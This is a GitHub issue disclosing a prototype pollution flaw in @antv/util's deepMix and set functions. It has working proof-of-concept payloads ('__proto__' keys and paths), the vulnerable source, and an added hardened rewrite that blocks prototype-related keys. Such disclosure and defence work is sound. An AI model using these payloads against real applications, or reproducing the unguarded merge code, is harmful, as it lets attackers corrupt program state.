Potential prototype pollution vulnerability · Issue #114 · antvis/util · GitHub
Potential prototype pollution vulnerability #114
Open
@yllhwa

Description
Reproduction code 1:

let deepMix = require("@antv/util").deepMix;

// JSON.parse creates "__proto__" as an own property of the parsed object,
// so a recursive merge that walks it writes into Object.prototype.
let BAD_JSON = JSON.parse('{"__proto__":{"test":123}}');

let obj = {};
deepMix(obj, BAD_JSON);

console.log({}.test); // 123  (a fresh object now inherits "test")

Problematic code:

const deepMix = function (rst: any, ...args: any[]) {
  for (let i = 0; i < args.length; i += 1) {
    _deepMix(rst, args[i]);
  }
  return rst;
};

Reproduction code 2:

let set = require("@antv/util").set;

let obj = {};
set(obj, "__proto__.test", 123);

console.log({}.test); // 123

Problematic code:

util/src/lodash/set.ts, lines 5 to 29 at c499a30:

/**
 * https://github.com/developit/dlv/blob/master/index.js
 * @param obj
 * @param path
 * @param value
 */
export default (obj: any, path: string | any[], value: any): any => {
  let o = obj;
  const keyArr = isString(path) ? path.split('.') : path;
  keyArr.forEach((key: string | number, idx: number) => {
    // not the last key
    if (idx < keyArr.length - 1) {
      if (!isObject(o[key])) {
        o[key] = isNumber(keyArr[idx + 1]) ? [] : {};
      }
      o = o[key];
    } else {
      o[key] = value;
    }
  });
  return obj;
};
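Both reproductions above share one root cause: neither `set` nor `deepMix` treats `__proto__` (or `constructor` / `prototype`) as off-limits, so a path segment or source key with that name redirects the write from the target object to `Object.prototype`. The block below is an added example, not code from @antv/util or from the reporter; the names `safeSet`, `safeDeepMix`, `mergeInto` and `FORBIDDEN_KEYS` are assumptions chosen for illustration. It shows the two operations with the same path and merge semantics as the snippets in the issue, plus a deny-list on prototype-related keys and an own-property check, and then replays the issue's two payloads against them.

```javascript
// Added example (not @antv/util's code): hardened `set` and `deepMix`
// variants that refuse to walk into prototype-related keys.
// Helper names and signatures are assumptions for illustration.

// Keys that let a write escape the target object and reach Object.prototype.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);

// Hardened counterpart of `set(obj, path, value)`: same dotted-path
// semantics as the issue's snippet, but a forbidden segment aborts the
// write before anything is touched, and only own properties are reused
// as intermediate containers.
function safeSet(obj, path, value) {
  const keyArr = typeof path === 'string' ? path.split('.') : path;
  let o = obj;
  for (let idx = 0; idx < keyArr.length; idx += 1) {
    const key = String(keyArr[idx]);
    if (FORBIDDEN_KEYS.has(key)) {
      throw new TypeError(`refusing to set prototype-related key "${key}"`);
    }
    if (idx < keyArr.length - 1) {
      if (!hasOwn(o, key) || o[key] === null || typeof o[key] !== 'object') {
        // Create an intermediate container; a numeric next key means array.
        o[key] = /^\d+$/.test(String(keyArr[idx + 1])) ? [] : {};
      }
      o = o[key];
    } else {
      o[key] = value;
    }
  }
  return obj;
}

// Hardened counterpart of `deepMix(rst, ...sources)`: recursive merge that
// copies only own enumerable keys of each source and silently drops the
// forbidden ones, so an attacker-controlled "__proto__" key is ignored.
function safeDeepMix(rst, ...sources) {
  for (const src of sources) {
    mergeInto(rst, src);
  }
  return rst;
}

function mergeInto(dst, src) {
  if (!isPlainObject(src)) return;
  for (const key of Object.keys(src)) {
    if (FORBIDDEN_KEYS.has(key)) continue; // drop __proto__ and friends
    const value = src[key];
    if (isPlainObject(value)) {
      if (!hasOwn(dst, key) || !isPlainObject(dst[key])) {
        dst[key] = {};
      }
      mergeInto(dst[key], value);
    } else {
      dst[key] = value;
    }
  }
}

// Replays the issue's two payloads (constructed inputs) against the
// hardened functions and also exercises a legitimate path and merge.
function demo() {
  const results = {};

  // Reproduction 1: "__proto__" survives JSON.parse as an own key.
  const BAD_JSON = JSON.parse('{"__proto__":{"test":123}}');
  safeDeepMix({}, BAD_JSON);
  results.deepMixPolluted = ({}).test !== undefined;

  // Reproduction 2: dotted path through "__proto__".
  let threw = false;
  try {
    safeSet({}, '__proto__.test', 123);
  } catch (e) {
    threw = e instanceof TypeError;
  }
  results.setThrew = threw;
  results.setPolluted = ({}).test !== undefined;

  // Legitimate use keeps working.
  results.legit = JSON.stringify(safeSet({}, 'a.0.b', 1));
  results.merged = JSON.stringify(safeDeepMix({ a: { x: 1 } }, { a: { y: 2 } }, { z: 3 }));
  return results;
}

console.log(demo());
```

Throwing from `safeSet` rather than silently skipping is a deliberate choice: a caller passing user-controlled paths almost certainly wants to know the input was hostile, whereas a merge of parsed JSON usually just wants the poisoned key gone, which is why `safeDeepMix` drops it instead. Either way, the check must run on every segment of the path, not just the first, since `a.__proto__.test` is as dangerous as `__proto__.test`.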
